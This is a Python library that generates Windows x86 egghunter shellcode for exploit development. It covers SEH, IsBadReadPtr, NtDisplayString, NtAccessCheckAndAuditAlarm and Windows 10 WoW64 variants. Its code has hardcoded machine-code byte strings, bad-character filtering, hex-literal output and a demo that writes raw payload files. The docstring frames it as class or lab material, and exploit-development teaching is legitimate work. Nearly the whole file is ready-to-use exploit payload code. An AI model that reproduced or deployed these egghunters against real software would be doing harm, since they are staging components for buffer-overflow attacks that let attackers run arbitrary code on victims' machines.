from __future__ import annotations

from dataclasses import dataclass
from pathlib import Path
from typing import Iterable, Literal

HunterKind = Literal[
    "x86_seh",
    "x86_isbadreadptr",
    "x86_ntdisplaystring",
    "x86_ntaccess",
    "x86_wow64_win10_ntaccess",
]


class EgghunterError(ValueError):
    """Base error for egghunter generation."""


class UnsupportedHunterError(EgghunterError):
    """Raised when a requested hunter is not implemented."""


class BadCharError(EgghunterError):
    """Raised when generated bytes contain excluded characters."""


@dataclass(frozen=True, slots=True)
class HunterSpec:
    name: str
    arch: str
    size: int | None
    needs_api_address: bool = False
    notes: str = ""


@dataclass(frozen=True, slots=True)
class BuildResult:
    kind: HunterKind
    tag: bytes
    shellcode: bytes

    @property
    def hex_escaped(self) -> str:
        return "".join(f"\\x{b:02x}" for b in self.shellcode)

    @property
    def python_bytes_literal(self) -> str:
        return f'b"{self.hex_escaped}"'

    def write_raw(self, path: str | Path) -> Path:
        out = Path(path)
        out.write_bytes(self.shellcode)
        return out


class Egghunters:
    """
    Deterministic Windows egghunter library for class/lab use.

    Implemented x86 variants:
      - x86_seh
      - x86_isbadreadptr       (requires target-process IsBadReadPtr address)
      - x86_ntdisplaystring
      - x86_ntaccess
      - x86_wow64_win10_ntaccess

    Native x64 variants are intentionally not hardcoded here.
    """

    _SPECS: dict[HunterKind, HunterSpec] = {
        "x86_seh": HunterSpec(
            name="SEH egghunter",
            arch="x86",
            size=69,
            notes="Classic SEH-based hunter.",
        ),
        "x86_isbadreadptr": HunterSpec(
            name="IsBadReadPtr egghunter",
            arch="x86",
            size=37,
            needs_api_address=True,
            notes="Requires IsBadReadPtr address from the target process.",
        ),
        "x86_ntdisplaystring": HunterSpec(
            name="NtDisplayString egghunter",
            arch="x86",
            size=32,
            notes="Classic int 0x2e / syscall-probe hunter.",
        ),
        "x86_ntaccess": HunterSpec(
            name="NtAccessCheckAndAuditAlarm egghunter",
            arch="x86",
            size=32,
            notes="Classic int 0x2e / syscall-probe hunter.",
        ),
        "x86_wow64_win10_ntaccess": HunterSpec(
            name="Windows 10 WoW64 egghunter",
            arch="x86 (WoW64)",
            size=39,
            notes="Win10/WoW64-specific syscall path.",
        ),
    }

    @classmethod
    def specs(cls) -> dict[HunterKind, HunterSpec]:
        return dict(cls._SPECS)

    @staticmethod
    def egg(tag: bytes = b"W00T") -> bytes:
        Egghunters._validate_tag(tag)
        return tag + tag

    @classmethod
    def build(
        cls,
        kind: HunterKind,
        tag: bytes = b"W00T",
        *,
        isbadreadptr_addr: int | None = None,
        excluded: bytes | Iterable[int] = b"",
    ) -> BuildResult:
        cls._validate_tag(tag)
        excluded_bytes = cls._normalize_badchars(excluded)

        if kind == "x86_seh":
            shellcode = cls._build_x86_seh(tag)
        elif kind == "x86_isbadreadptr":
            if isbadreadptr_addr is None:
                raise EgghunterError(
                    "x86_isbadreadptr requires isbadreadptr_addr from the target process"
                )
            shellcode = cls._build_x86_isbadreadptr(tag, isbadreadptr_addr)
        elif kind == "x86_ntdisplaystring":
            shellcode = cls._build_x86_ntdisplaystring(tag)
        elif kind == "x86_ntaccess":
            shellcode = cls._build_x86_ntaccess(tag)
        elif kind == "x86_wow64_win10_ntaccess":
            shellcode = cls._build_x86_wow64_win10_ntaccess(tag)
        else:
            raise UnsupportedHunterError(f"Unsupported hunter kind: {kind}")

        cls._validate_badchars(shellcode, excluded_bytes)
        return BuildResult(kind=kind, tag=tag, shellcode=shellcode)

    @staticmethod
    def _validate_tag(tag: bytes) -> None:
        if len(tag) != 4:
            raise EgghunterError("Tag must be exactly 4 bytes")

    @staticmethod
    def _normalize_badchars(excluded: bytes | Iterable[int]) -> bytes:
        if isinstance(excluded, bytes):
            values = list(excluded)
        else:
            values = [int(x) & 0xFF for x in excluded]
        return bytes(sorted(set(values)))

    @staticmethod
    def _validate_badchars(shellcode: bytes, excluded: bytes) -> None:
        hits = sorted(set(shellcode) & set(excluded))
        if hits:
            rendered = " ".join(f"{b:02x}" for b in hits)
            raise BadCharError(
                f"Generated egghunter contains excluded byte(s): {rendered}"
            )

    @staticmethod
    def _pack32(value: int) -> bytes:
        if not (0 <= value <= 0xFFFFFFFF):
            raise EgghunterError("32-bit address must be in range 0..0xFFFFFFFF")
        return value.to_bytes(4, "little", signed=False)

    @staticmethod
    def _build_x86_seh(tag: bytes) -> bytes:
        # From public exploit-dev tool collections, with tag inserted as raw 4-byte ASCII.
        return (
            b"\xeb\x21\x59\xb8"
            + tag
            + b"\x51\x6a\xff\x33\xdb\x64\x89\x23\x6a\x02\x59\x8b\xfb\xf3\xaf"
            b"\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xda\xff"
            b"\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58"
            b"\x83\xc4\x10\x50\x33\xc0\xc3"
        )

    @classmethod
    def _build_x86_isbadreadptr(cls, tag: bytes, isbadreadptr_addr: int) -> bytes:
        return (
            b"\x33\xdb\x66\x81\xcb\xff\x0f\x43\x6a\x08\x53\xb8"
            + cls._pack32(isbadreadptr_addr)
            + b"\xff\xd0\x85\xc0\x75\xec\xb8"
            + tag
            + b"\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
        )

    @staticmethod
    def _build_x86_ntdisplaystring(tag: bytes) -> bytes:
        return (
            b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58\xcd\x2e\x3c\x05\x5a"
            b"\x74\xef\xb8" + tag + b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
        )

    @staticmethod
    def _build_x86_ntaccess(tag: bytes) -> bytes:
        return (
            b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
            b"\x74\xef\xb8" + tag + b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
        )

    @staticmethod
    def _build_x86_wow64_win10_ntaccess(tag: bytes) -> bytes:
        return (
            b"\x33\xd2"
            b"\x66\x81\xca\xff\x0f"
            b"\x33\xdb"
            b"\x42"
            b"\x52"
            b"\x53\x53\x53\x53"
            b"\x6a\x29"
            b"\x58"
            b"\xb3\xc0"
            b"\x64\xff\x13"
            b"\x83\xc4\x10"
            b"\x5a"
            b"\x3c\x05"
            b"\x74\xe3"
            b"\xb8" + tag + b"\x8b\xfa\xaf\x75\xde\xaf\x75\xdb\xff\xe7"
        )


def demo() -> None:
    tag = b"W00T"

    ntaccess = Egghunters.build("x86_ntaccess", tag, excluded=b"\x00\x0a\x0d")
    print("x86_ntaccess bytes:", ntaccess.python_bytes_literal)
    ntaccess.write_raw("x86_ntaccess.bin")

    wow64 = Egghunters.build("x86_wow64_win10_ntaccess", tag)
    print("x86_wow64_win10_ntaccess bytes:", wow64.python_bytes_literal)
    wow64.write_raw("x86_wow64_win10_ntaccess.bin")

    print("egg marker:", Egghunters.egg(tag))


if __name__ == "__main__":
    demo()
